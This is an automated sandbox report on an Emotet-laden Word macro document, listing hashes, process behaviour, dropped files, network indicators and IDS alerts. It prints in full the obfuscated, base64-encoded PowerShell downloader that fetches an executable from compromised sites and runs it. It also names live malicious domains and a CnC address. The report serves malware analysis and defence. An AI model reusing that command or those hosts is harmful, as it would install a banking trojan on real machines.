analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

swift

Full analysis: https://app.any.run/tasks/3d0782db-74f5-473b-9cae-c78d67285633
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 30, 2020, 02:46:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
trojan
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Vel., Author: Antoine Aubry, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 23:12:00 2020, Last Saved Time/Date: Tue Sep 29 23:12:00 2020, Number of Pages: 1, Number of Words: 3731, Number of Characters: 21269, Security: 8
MD5:

E27EC29639E984664652FBECF0FB4A5E

SHA1:

EE5008B09021C50C9A924A9238C1C9AD4A892D92

SHA256:

E2689C227EA6D5424060E6FCE6DEAB414A52C4D27719A2A2F4A2B9EB635D4F9A

SSDEEP:

1536:TNVLAAAAcAAAAAUmPxwMddylbvuNm9F96qp3WAfjlyqf:TLAAAAcAAAAAUSxRYs4BLlyqf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Pccesw28f.exe (PID: 1304)
      • WinFax.exe (PID: 1888)
    • EMOTET was detected

      • WinFax.exe (PID: 1888)
    • Changes the autorun value in the registry

      • WinFax.exe (PID: 1888)
    • Connects to CnC server

      • WinFax.exe (PID: 1888)
  • SUSPICIOUS

    • PowerShell script executed

      • POwersheLL.exe (PID: 2464)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 2464)
    • Executed via WMI

      • POwersheLL.exe (PID: 2464)
    • Reads Internet Cache Settings

      • WinFax.exe (PID: 1888)
    • Executable content was dropped or overwritten

      • Pccesw28f.exe (PID: 1304)
      • POwersheLL.exe (PID: 2464)
    • Connects to server without host name

      • WinFax.exe (PID: 1888)
    • Starts itself from another location

      • Pccesw28f.exe (PID: 1304)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2524)
    • Reads settings of System Certificates

      • POwersheLL.exe (PID: 2464)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2524)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
LocaleIndicator: 1033
CodePage: Unicode UTF-16, little endian
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 24951
Paragraphs: 49
Lines: 177
Company: -
Security: Locked for annotations
Characters: 21269
Words: 3731
Pages: 1
ModifyDate: 2020:09:29 22:12:00
CreateDate: 2020:09:29 22:12:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Antoine Aubry
Subject: -
Title: Vel.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe pccesw28f.exe #EMOTET winfax.exe

Process information

PID
CMD
Path
Indicators
Parent process
2524"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\swift.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2464POwersheLL -ENCOD JABKADYAZQBvADQAMAA1AD0AKAAoACcAUAB5ACcAKwAnAHgAMQBnACcAKQArACcAeQA1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAdQBTAGUAUgBwAFIAbwBmAGkATABlAFwAQQBiAEMAcQAwAEwANABcAFAARQBpAGsAcAA0AFQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIARQBjAHQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAFUAYABSAGkAYABUAFkAUAByAG8AdABPAGMAYABPAEwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAxADIAJwArACcALAAnACsAJwAgAHQAJwApACsAJwBsACcAKwAoACcAcwAxADEALAAnACsAJwAgACcAKwAnAHQAJwApACsAJwBsAHMAJwApADsAJABYADkAZgAzAG4AeQBlACAAPQAgACgAJwBQACcAKwAoACcAYwBjAGUAcwAnACsAJwB3ACcAKQArACgAJwAyADgAJwArACcAZgAnACkAKQA7ACQASABmAGoANABwAGUAcAA9ACgAJwBMAHQAJwArACgAJwB1ADIAJwArACcAZAAnACkAKwAnAGMAaQAnACkAOwAkAEcAOQA0ADgAawBzAGQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAYwAnACsAKAAnAEUAUgBBACcAKwAnAGIAYwBxACcAKQArACgAJwAwAGwANAAnACsAJwBjAEUAJwApACsAKAAnAFIAUABlAGkAawAnACsAJwBwACcAKwAnADQAJwApACsAKAAnAHQAYwBFACcAKwAnAFIAJwApACkALgAiAHIARQBwAGwAQQBgAGMARQAiACgAKAAnAGMAJwArACcARQBSACcAKQAsACcAXAAnACkAKQArACQAWAA5AGYAMwBuAHkAZQArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAFcAawB6AGMAcwA5AGwAPQAoACcAUgBtACcAKwAoACcAMgBvAGQAJwArACcAMgBlACcAKQApADsAJABFAHAAdQBtAGwAdwA2AD0AJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMATABJAGUATgBUADsAJABJAHoAcwB1AHkAbQBxAD0AKAAoACcAaAB0AHQAcAAnACsAJwBzACcAKQArACgAJwA6AC8ALwB0AHIAdQAnACsAJwBlAHQAZQAnACsAJwBlAHMAJwArACcAaABpACcAKQArACgAJwByAHQALgBjAG8AbQAvACcAKwAnAHcAcAAtAGEAZABtACcAKwAnAGkAJwApACsAKAAnAG4AJwArACcALwA1AC8AJwApACsAKAAnACoAaAB0ACcAKwAnAHQAJwApACsAJwBwACcAKwAnAHMAOgAnACsAKAAnAC8ALwBuAGgAYQAnACsAJwBwACcAKQArACgAJwBoAG8AJwArACcAbQBhAHUALgBjAG8AJwApACsAJwBtACcAKwAnAC8AcwAnACsAKAAnAGEANwAvACcAKwAnACoAJwApACsAKAAnAGgAdAB0ACcAKwAnAHAAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AaAAnACsAJwBlAGMAJwApACsAJwBrAC0AJwArACgAJwBlAGwAJwArACcAZQAnACsAJwBjAHQAcgAnACkAKwAoACcAaQAnACsAJwBjAC4AYwAnACsAJwBvAG0ALwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAoACcAbAB1ACcAKwAnAGQAZQAnACkAKwAoACcAcwAvAHYAJwArACcAVQAnACkAKwAnAEIAJwArACgAJwAvACoAJwArACcAaAB0AHQAcAA6ACcAKwAnAC8ALwB0ACcAKQArACgAJwBlACcAKwAnAGMAaAAnACkAKwAoACcAaQBuACcAKwAnAG8AdAAnACsAJwBpAGYAaQBjAGEAdAAnACsAJwBpACcAKQArACgAJwBvACcAKwAnAG4ALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQBpACcAKwAnAG4AJwApACsAJwBjACcAKwAoACcAbAB1AGQAZQBzACcAKwAnAC8AJwApACsAKAAnAGkAaQAxACcAKwAnAHAAZAAnACkAKwAoACcAMAAnACsAJwB4AC8AKgAnACsAJwBoAHQAdAAnACkAKwAoACcAcAAnACsAJwA6AC8ALwAnACsAJwBlAGQAaQB0AHoAYQByACcAKwAnAG0AeQAuACcAKQArACcAYwAnACsAJwBvACcAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAbwB1AHIAJwApACsAKAAnAG4AJwArACcAYQBsAC8AVwAnACkAKwAoACcAaQBuAEUAJwArACcAQQAvACcAKwAnACoAaAB0AHQAJwArACcAcABzACcAKwAnADoALwAvAG4AbwBpAHQAaAAnACsAJwBhACcAKQArACgAJwB0AGYAJwArACcAaABvAHUAcwAnACsAJwBlAC4AYwBvAG0AJwArACcALwB3ACcAKQArACgAJwBwACcAKwAnAC0AaQAnACkAKwAnAG4AJwArACgAJwBjACcAKwAnAGwAdQBkAGUAcwAvACcAKQArACcAZwAnACsAKAAnADUASgBJADIAMQBTAC8AKgAnACsAJwBoAHQAJwArACcAdABwACcAKQArACgAJwA6AC8AJwArACcALwB0AGUAYwBoAGkAdAAnACsAJwByAGUAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGkAbgBjAGwAdQAnACkAKwAnAGQAZQAnACsAKAAnAHMALwAnACsAJwBxAE8ALwAnACkAKQAuACIAcwBQAGwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABHAHkAeQB5AHYANABqAD0AKAAoACcASQAnACsAJwB4AGkAJwApACsAJwBsACcAKwAoACcAbgAnACsAJwA3AF8AJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABQADEAMABjAGcAdgBjACAAaQBuACAAJABJAHoAcwB1AHkAbQBxACkAewB0AHIAeQB7ACQARQBwAHUAbQBsAHcANgAuACIARABPAGAAdwBOAGwATwBhAGAARABgAEYAaQBMAGUAIgAoACQAUAAxADAAYwBnAHYAYwAsACAAJABHADkANAA4AGsAcwBkACkAOwAkAFgAagAzAHIAaQBjAHkAPQAoACcAVgAnACsAKAAnAF8AJwArACcAZQAnACsAJwBjAG4AYQByACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEcAOQA0ADgAawBzAGQAKQAuACIAbABgAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMANAAwADkAOQApACAAewAuACgAJwBJACcAKwAnAG4AJwArACcAdgBvAGsAJwArACcAZQAtAEkAdABlAG0AJwApACgAJABHADkANAA4AGsAcwBkACkAOwAkAEoAcwBwAG8AdQB5AGMAPQAoACgAJwBFACcAKwAnADMANgB6AF8AJwApACsAJwA5ACcAKwAnADUAJwApADsAYgByAGUAYQBrADsAJABUAHIANQAwAHkAMABnAD0AKAAoACcASAA1ACcAKwAnAHcAeQBnACcAKQArACcAZgBsACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATgA4AGEAbgB1AHcAbgA9ACgAKAAnAFIAJwArACcAcQBjAGwAJwApACsAJwA0ACcAKwAnAHoANgAnACkA C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1304"C:\Users\admin\Abcq0l4\Peikp4t\Pccesw28f.exe" C:\Users\admin\Abcq0l4\Peikp4t\Pccesw28f.exe
POwersheLL.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Exit code:
0
Version:
2.8.0.3
1888"C:\Users\admin\AppData\Local\dbnetlib\WinFax.exe"C:\Users\admin\AppData\Local\dbnetlib\WinFax.exe
Pccesw28f.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Version:
2.8.0.3
Total events
2 379
Read events
1 482
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
2524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB05A.tmp.cvr
MD5:
SHA256:
2464POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QUX60FQ5GSGGUEK3R0DQ.temp
MD5:
SHA256:
2464POwersheLL.exeC:\Users\admin\Abcq0l4\Peikp4t\Pccesw28f.exe
MD5:
SHA256:
1304Pccesw28f.exeC:\Users\admin\AppData\Local\Temp\~DF563DA5CAF3F56CB5.TMP
MD5:
SHA256:
2524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:E5EA026B2C988D767D6776716A6809E0
SHA256:6C71D37D4CF398C5A7F1053366BB6C96CC5E9FB9ED4B603569339469623975E1
2524WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:805D324C2ED5881EA3ADBC69E480259D
SHA256:B6AB19261EA555DB7A9B70FA96282BE2B967C2F50AB3FAC701C4DFA0B655A248
2464POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:907C5FD303717561FE1B4EA4297DAC9A
SHA256:219788D162769A2E9475AF5337CA17B4D213A15ADE3E7F46F3FC02ADD48CD09D
1304Pccesw28f.exeC:\Users\admin\AppData\Local\dbnetlib\WinFax.exeexecutable
MD5:7B679DEACF3D66D0A97A22A4F33E9C07
SHA256:15299F2DDDAA568F2931ECA8D6ADD5B59B33D886440D69B8CEE54C729D015C6F
2464POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19baca.TMPbinary
MD5:907C5FD303717561FE1B4EA4297DAC9A
SHA256:219788D162769A2E9475AF5337CA17B4D213A15ADE3E7F46F3FC02ADD48CD09D
2524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$swift.docpgc
MD5:B9FF707F9895273AE0AEF6BFF8C1E3C5
SHA256:F296A1BFFBE5C2434450A14BD847039B55C46191C7AA1277C7C912B0F9380DD8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
8
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1888
WinFax.exe
POST
200
104.193.103.61:80
http://104.193.103.61/x6Pw77OG28T/hmUXSO/Kw3QiFtRLLXdQuLHb/BCkF44aHFxtYr4MhdH/
US
binary
132 b
malicious
2464
POwersheLL.exe
GET
200
104.27.166.204:80
http://editzarmy.com/journal/WinEA/
US
html
4.19 Kb
suspicious
2464
POwersheLL.exe
GET
200
172.67.205.25:80
http://techinotification.com/wp-includes/ii1pd0x/
US
html
4.19 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2464
POwersheLL.exe
202.182.109.85:443
nhaphomau.com
Managed Solutions Internet AS Internet Service Provider
AU
unknown
2464
POwersheLL.exe
104.28.24.228:443
trueteeshirt.com
Cloudflare Inc
US
shared
2464
POwersheLL.exe
148.72.85.14:443
heck-electric.com
US
unknown
1888
WinFax.exe
104.193.103.61:80
Delcom, Inc.
US
malicious
2464
POwersheLL.exe
104.27.166.204:80
editzarmy.com
Cloudflare Inc
US
suspicious
2464
POwersheLL.exe
172.67.205.25:80
techinotification.com
US
suspicious
2464
POwersheLL.exe
45.77.39.85:443
noithatfhouse.com
Choopa, LLC
SG
suspicious

DNS requests

Domain
IP
Reputation
trueteeshirt.com
  • 104.28.24.228
  • 172.67.154.168
  • 104.28.25.228
unknown
nhaphomau.com
  • 202.182.109.85
unknown
heck-electric.com
  • 148.72.85.14
suspicious
techinotification.com
  • 172.67.205.25
  • 104.31.80.83
  • 104.31.81.83
suspicious
editzarmy.com
  • 104.27.166.204
  • 172.67.152.168
  • 104.27.167.204
suspicious
noithatfhouse.com
  • 45.77.39.85
suspicious

Threats

PID
Process
Class
Message
1888
WinFax.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M10
No debug info